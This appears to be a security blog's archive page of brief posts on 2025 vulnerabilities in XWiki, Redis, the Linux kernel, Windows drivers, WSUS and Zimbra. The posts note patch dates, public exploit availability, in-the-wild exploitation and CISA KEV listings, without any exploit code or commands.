Category Archives: Vulnerability

About Remote Code Execution – XWiki Platform (CVE-2025-24893) vulnerability

Leave a reply

About Remote Code Execution - XWiki Platform (CVE-2025-24893) vulnerability

About Remote Code Execution – XWiki Platform (CVE-2025-24893) vulnerability. XWiki is a free and open-source wiki platform written in Java, with a strong focus on extensibility. It supports WYSIWYG visual editing, importing and exporting documents in OpenDocument format, adding annotations and tags, as well as flexible access rights management. The vulnerability allows an attacker with guest-level privileges to execute arbitrary code on the server by sending a crafted SolrSearch request.

⚙️ The vulnerability was fixed in versions 15.10.11, 16.4.1 and 16.5.0RC1, released in July 2024.

🛠 A proof-of-concept (POC) exploit was available in the original task to fix ZDI-CAN-23994, as well as in the security bulletin published on February 20, 2025. There are now more than 30 exploit variants on GitHub.

👾 On October 28, VulnCheck reported that the vulnerability was being exploited in the wild to deploy cryptominers. On October 30, it was added to the CISA KEV catalog.

На русском

About Elevation of Privilege – Linux Kernel (CVE-2025-38001) vulnerability

Leave a reply

About Elevation of Privilege - Linux Kernel (CVE-2025-38001) vulnerability

About Elevation of Privilege – Linux Kernel (CVE-2025-38001) vulnerability. It affects the Linux HFSC network scheduler module. An authenticated attacker can exploit this flaw to gain root privileges.

⚙️ This vulnerability is from the June Linux Patch Wednesday. In the Vulristics report, it was no different from 354 other Linux Kernel vulnerabilities: the NVD provides a lengthy description that doesn’t clearly indicate the real-world impact of exploitation, and there is no CVSS vector. Classic. 🙄

🛠 About a month after the updates were released in Linux distributions, on July 11, a write-up and a public exploit for this vulnerability were published. In a demo video, a local attacker downloads and executes a binary,after which he obtains a root shell and reads the contents of /etc/shadow. The release of this exploit barely attracted attention on specialized media platforms. 🤷‍♂️

👾 So far, there are no reports of this flaw being exploited in the wild.

На русском

About Remote Code Execution – Redis “RediShell” (CVE-2025-49844) vulnerability

Leave a reply

About Remote Code Execution - Redis RediShell (CVE-2025-49844) vulnerability

About Remote Code Execution – Redis “RediShell” (CVE-2025-49844) vulnerability. Redis is a popular in-memory key–value database, used as a distributed cache and message broker, with optional durability. This vulnerability allows a remote authenticated attacker to execute arbitrary code via a specially crafted Lua script. The requirement for authentication does not reduce its severity, because authentication in Redis is disabled by default and is often not used. 🤷‍♂️

⚙️ The vulnerability was discovered by Wiz researchers and presented at Pwn2Own Berlin in May of this year; it was fixed on October 3 (version 8.2.2).

🛠 As of October 7, a public exploit for the vulnerability is available on GitHub.

👾 There are no reports of attacks so far.

🌐 As of October 7, 330,000 Redis instances were accessible on the Internet, of which 60,000 had no authentication.

На русском

About Elevation of Privilege – Windows Agere Modem Driver (CVE-2025-24990) vulnerability

Leave a reply

About Elevation of Privilege - Windows Agere Modem Driver (CVE-2025-24990) vulnerability

About Elevation of Privilege – Windows Agere Modem Driver (CVE-2025-24990) vulnerability. The vulnerability is from Microsoft’s October Patch Tuesday. Agere Modem Driver (ltmdm64.sys) is a software component that allows a computer to communicate with an Agere (or LSI) modem for dial‑up or fax connections. 📠🙄 Despite its questionable practical usefulness, the driver continued to be shipped with Windows. A local attacker who successfully exploits this vulnerability in the driver can obtain administrative privileges.

⚙️ The Microsoft cumulative update from October 14 removes this driver from the system.

🛠 On October 16, an exploit for the vulnerability was published on GitHub. The author reports that the driver has been shipped since Windows Vista. Microsoft had known about the issue since at least 2014 (11 years ❗️) but ignored it. 🤷‍♂️

👾 On October 22, this vulnerability was added to the CISA KEV; details about active attacks are not yet known.

На русском

About Cross Site Scripting – Zimbra Collaboration (CVE-2025-27915) vulnerability

Leave a reply

About Cross Site Scripting - Zimbra Collaboration (CVE-2025-27915) vulnerability

About Cross Site Scripting – Zimbra Collaboration (CVE-2025-27915) vulnerability. Zimbra Collaboration is a collaboration software suite, somewhat similar to Microsoft Exchange. Exploiting this vulnerability in the web mail client (Classic Web Client) allows an unauthenticated attacker to execute arbitrary JavaScript in the context of the victim’s session. To do this, the attacker only needs to send an email with a specially crafted ICS file (iCalendar). The payload is triggered when the message is viewed in the web interface.

⚙️ The vulnerability was patched on January 27 in versions 9.0.0 Patch 44, 10.0.13, 10.1.5, as well as in the unofficial free Zimbra FOSS build from Maldua.

🛠 On September 30, StrikeReady Labs published a vulnerability analysis with a public exploit.

👾 StrikeReady Labs reported the vulnerability was exploited against Brazil’s military in January, before the patch was released. The vulnerability was added to CISA KEV on October 7.

На русском

About Remote Code Execution – Windows Server Update Services (WSUS) (CVE-2025-59287) vulnerability

Leave a reply

About Remote Code Execution - Windows Server Update Services (WSUS) (CVE-2025-59287) vulnerability

About Remote Code Execution – Windows Server Update Services (WSUS) (CVE-2025-59287) vulnerability. WSUS is a legacy Windows Server component that allows IT administrators to manage the download and installation of Microsoft product updates on computers within a local network. Vulnerability summary: An unauthenticated remote attacker can execute code with SYSTEM privileges on a Windows server with the WSUS Server Role enabled (it is disabled by default) by sending specially crafted POST requests. This is possible due to a flaw in deserializing untrusted data.

⚙️ Initial patches were released on October 14 as part of Microsoft’s October Patch Tuesday.

🛠 A public exploit has been available on GitHub since October 18.

⚙️ On October 24, Microsoft released additional patches to fully address the vulnerability (server reboot is required).

👾 On October 24, the vulnerability was added to the CISA KEV, and there are reports of observed exploitation attempts.

На русском

October Linux Patch Wednesday

Leave a reply

October Linux Patch Wednesday

October Linux Patch Wednesday. In October, Linux vendors began addressing 801 vulnerabilities, slightly more than in September. Of these, 546 are in the Linux Kernel. One is being exploited in the wild:

🔻 EoP – VMware Tools (CVE-2025-41244). This vulnerability has been exploited since October 2024, and public exploits are available. According to the description, exploitation requires VMware Aria Operations.

Public or suspected exploits exist for 39 more vulnerabilities, including:

🔸 RCE – Redis (CVE-2025-49844 – RediShell, CVE-2025-46817), OpenSSH (CVE-2025-61984), 7-Zip (CVE-2025-11001, CVE-2025-11002)
🔸 EoP – FreeIPA (CVE-2025-7493), Asterisk (CVE-2025-1131)
🔸 SQLi – MapServer (CVE-2025-59431)
🔸 SFB – authlib (CVE-2025-59420)
🔸 MemCor – Binutils (CVE-2025-11082 and 7 more), Open Babel (CVE-2025-10995 and 6 more)

🗒 Full Vulristics report

На русском